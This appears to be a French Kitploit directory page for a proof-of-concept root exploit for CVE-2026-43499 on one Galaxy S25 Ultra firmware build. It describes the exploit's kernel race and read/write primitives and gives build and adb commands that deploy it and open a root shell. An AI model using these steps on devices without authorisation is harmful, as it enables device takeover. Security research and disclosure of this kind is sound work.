Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-43499-S25U — PoC autonome CVE-2026-43499 pour Galaxy S25 Ultra SM-S938N S938NKSUACZF1 | Kitploit
Outils/GitHubGitHub/busung-dev/cve-2026-43499-s25u
Sécurité AndroidEscalade de PrivilègesExploitationPost-ExploitationRed TeamingDéveloppement de Charges UtilesExploitation de Binaires
GitHubbusung-dev/cve-2026-43499-s25u

CVE-2026-43499-S25U

PoC autonome CVE-2026-43499 pour Galaxy S25 Ultra SM-S938N S938NKSUACZF1

Voir le dépôt
39103il y a 1 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-43499 PoC pour Galaxy S25 Ultra

Preuve de concept spécifique à l'appareil pour CVE-2026-43499 sur le Samsung Galaxy S25 Ultra coréen.

Cible prise en charge

root@kitploit:~
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages

Les décalages (offsets) et dispositions des structures ne sont valides que pour le firmware ci-dessus.

Référence

Ce port est basé sur :

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • Révision amont : b850d3bddc74c3328d5fbcc0568d21962b55d949

La licence Apache 2.0 amont est conservée dans LICENSE.

Modifications du port

  • Ajout des décalages et dispositions du noyau pour pa3q-S938NKSUACZF1.
  • Ajout de la récupération du décalage KASLR basée sur tracefs pour ce noyau Samsung.
  • Portage de la race condition pselect, de l'étape CFI/FOPS et de la primitive de lecture/écriture physique.
  • Ajout du chemin root user-mode-helper system_unbound_wq spécifique à l'appareil.
  • Ajout de processus de relance isolés avec la séquence de délai pselect ajustée pour l'appareil.
  • Conserve les pages récupérées après succès pour éviter le recyclage d'objets contrefaits actifs.

Compilation

Définissez ANDROID_NDK_HOME sur Android NDK r29 ou une chaîne d'outils compatible :

root@kitploit:~
make -j8

Sorties :

root@kitploit:~
build/cve-2026-43499
build/cve-2026-43499-root

Déploiement et exécution

root@kitploit:~
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

L'exploit utilise par défaut 16 tentatives indépendantes et un délai pselect de base de 20 000 microsecondes. Remplacez-les lors de la collecte de données de synchronisation :

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"

La session root temporaire et les allocations conservées durent jusqu'au redémarrage.

Pour une installation en un clic et le support KernelSU, utilisez Root My Galaxy.

Utilisez uniquement sur des appareils dont vous êtes propriétaire ou que vous êtes explicitement autorisé à tester.

Télécharger l’outil